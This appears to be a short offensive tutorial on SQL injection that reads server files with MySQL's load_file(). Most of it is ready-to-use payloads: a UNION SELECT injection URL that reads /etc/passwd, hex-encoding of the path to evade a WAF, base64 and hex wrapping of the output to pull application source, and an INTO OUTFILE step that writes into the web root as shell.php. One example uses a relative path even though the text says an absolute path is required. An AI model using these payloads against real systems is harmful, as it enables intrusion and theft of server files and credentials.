SQL Injection: LFI (Local File Inclusion) via load_file() function

September 4, 2022 ยท View on GitHub

If the database user has read permission (which most of the time it does), it is possible for an attacker to read the internal file of the server, with a small caviat that the absolute path must be known (just as a normal LFI). In order to perform this kind of attack, the following function must be used:

load_file(/path/to/file)

For example, the most basic approach is to read /etc/passwd:

load_file('../etc/passwd')

A simple usage of the query:

http://domain.com/index.php?id=1' Union Select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11,12-- -

Alternatively you can convert /etc/passwd in 0xHex Format (in case WAF blocks it, or the backslashes might break up the syntax:

load_file(0x2e2e2f6574632f706173737764)

Just like normal LFI, it is possible to convert the content of the file in base64, thanks to TO_base64() function:

TO_base64(LOAD_FILE('/var/www/html/index.php'))  

You can also use hex() function in configuration files especially, when some characters are non-readable and might break the execution of the query:

hex(load_file('/etc/passwd'))

It is possible to read the content of the file and copy it somewhere else where it's accessible to read:

load_file('/etc/passwd') INTO OUTFILE '/var/www/html/shell.php'--